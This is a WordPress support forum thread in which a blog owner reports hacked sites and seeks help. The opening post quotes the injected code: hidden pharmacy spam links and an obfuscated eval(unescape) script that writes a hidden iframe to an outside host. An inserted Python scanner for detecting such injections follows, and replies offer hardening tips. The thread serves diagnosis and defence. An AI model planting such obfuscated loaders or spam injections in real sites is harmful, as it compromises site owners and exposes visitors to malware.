Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Every time
   I check out the source of my blogs I see these kinds of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with htaccess (No effect)
    – Change FTP password
    – Check permissions of files and folders
    – Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
    – What can I do to stop these kinds of exploits in the future?
 * Thanks!
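
A defender-side check for the two injections quoted in the post above, added here as an example and not part of the original thread: it flags the hidden zero-size link block and the `eval(unescape(...))` wrapper in files or saved page source, and decodes the payload statically without running it. The sample page, the `injected.example` and `spam.example` hosts, and all function names are constructed for illustration.

```python
import os
import re
from urllib.parse import unquote

# Patterns modelled on the two injections quoted in the post (heuristics, not a full scanner).
EVAL_UNESCAPE = re.compile(r"eval\s*\(\s*unescape\s*\(\s*([\"'])(.*?)\1\s*\)\s*\)", re.I | re.S)
HIDDEN_FONT = re.compile(r"<font\s+style=(['\"])[^'\"]*height:\s*0[^'\"]*width:\s*0[^'\"]*\1", re.I)
AFTER_HTML_CLOSE = re.compile(r"</html\s*>\s*\S", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=\\?['\"]?([^\s'\"\\>]+)", re.I)

def js_unescape(s):
    """Static equivalent of JavaScript unescape(): %uXXXX first, then %XX as Latin-1."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def scan(text):
    """Return (finding, detail) tuples for one file or saved page; nothing is executed."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(text):
        decoded = js_unescape(m.group(2))
        findings.append(("eval-unescape", decoded))
        findings += [("hidden-iframe-src", src) for src in IFRAME_SRC.findall(decoded)]
    if HIDDEN_FONT.search(text):
        findings.append(("zero-size-font-block", "links styled height:0/width:0"))
    if AFTER_HTML_CLOSE.search(text):
        findings.append(("markup-after-html-close", "content appended after </html>"))
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a WordPress directory and map each suspicious file to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample with the same shape as the injected markup (hosts are placeholders).
SAMPLE_JS = "d.write('<IFRAME name=c1 src=\\'http://injected.example/in.cgi?2\\' style=\\'display: none\\'></IFRAME>');"
SAMPLE_PAGE = ("<html><body>post</body></html>"
               "<font style='position: absolute;overflow: hidden;height: 0;width: 0'>"
               "<a href=\"http://spam.example/page.php\">spam</a>\n<Script>\nvar d=document;\n"
               "eval( unescape( \"" + "".join("%%%02x" % b for b in SAMPLE_JS.encode("latin-1")) + "\" ));\n</Script>")

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE):
        print(kind, "->", detail)
```

Running `scan_tree()` over the blog root and theme folders on a schedule, and comparing hits against a fresh WordPress download, shows which files (such as the root `index.php` mentioned above) were rewritten.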

Viewing 6 replies - 16 through 21 (of 21 total)


 *  [macsoft3](https://wordpress.org/support/users/macsoft3/)
 * (@macsoft3)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718256)
 * I would create a new administrative username for WP, deleting all others. If they
   know your administrative username, they can just run a program to guess the password,
   just like guessing a PIN number.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718258)
 * Attack repeated. I’ve already changed the password and did all the stuff, but they
   somehow managed to change the index files to files pointing to their site pizdec
   dot ru. It is other guys using the same software – the previous attack was used to
   promote another site.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718259)
 * segal, I **really** recommend using my [post-logger](http://www.village-idiot.org/post-logger)
   plugin.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718260)
 * > segal, I really recommend using my post-logger plugin.
 * Thanks, installed.
 *  [Sonika](https://wordpress.org/support/users/sonika/)
 * (@sonika)
 * [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718269)
 * Maybe the plugin “anti xss attack” would help you?
    for WP 2.5: [http://mywordpress.ru/plugins/anti-xss-attack/2/](http://mywordpress.ru/plugins/anti-xss-attack/2/)
    for WP 2.3.3: [http://maxsite.org/anti-xss-attack-update](http://maxsite.org/anti-xss-attack-update)
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Thank you!


The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

